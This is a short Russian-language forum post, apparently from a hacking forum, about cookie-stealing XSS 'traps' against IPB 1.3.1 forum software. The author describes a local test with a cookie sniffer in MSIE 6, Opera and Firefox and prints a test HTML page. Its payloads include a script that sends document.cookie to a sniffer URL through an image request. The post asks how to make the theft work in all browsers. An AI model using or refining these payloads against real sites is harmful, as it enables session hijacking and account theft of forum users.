Заметил что xss ловушки срабатывают только в ИЕ на примере IPB 1.3.1 final. Решил детально изучить в чем загвоздка.
1) Установил IPB локально
2) Установил локально сниффер
подопытные браузеры : MSIE 6.0, Opera 9.01, Firefox 2.0
Предистория - я не включаю рисунки в браузере, привычка сложилась с давних пор, когда сидел в lynx или когда было мало трафика и маленькая скорость.
Естественно, если рисунки отключены, то комбинации в ловушке типа ../sniffer/image.gif обламываются, и никаких куких с ссылкой на рисунок мы не получим.
Короче приступил к тестированию. Из 8 ловушек в ИЕ на ИПБ 1.3.1 сработало 6. В Фаере или Опере ничего не сработало.
Создал тестовую хтмл, с текстом
Код:
<script>alert(document.cookie);</script>
<img src="http://localhost/s/s.gif">
<script>img = new Image(); img.src = "http://localhost/s/s.gif?"+document.cookie;</script>
Чтобы получить куки их Оперы или Фаера надо зайти на страничку форума (под логином) и потом только на эту хтмл. Только тогда в логах сниффера будет куки и другая нам нужная инфа. То есть надо еше одно насильное действие
Отсюда вытекает вопрос - как сделать чтоб работало во всех браузерах, и почему оно кстати не работает?